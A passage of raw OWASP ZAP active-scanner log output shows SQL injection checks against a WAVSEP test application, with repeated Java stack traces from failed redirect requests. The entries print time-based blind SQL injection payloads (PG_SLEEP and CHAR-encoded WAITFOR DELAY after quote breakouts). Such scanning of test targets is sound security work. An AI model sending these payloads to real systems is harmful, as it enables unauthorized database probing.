org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681683 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681684 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681685 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681685 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681686 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681687 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681688 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681688 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681689 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681689 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681690 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681691 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681692 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681692 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY 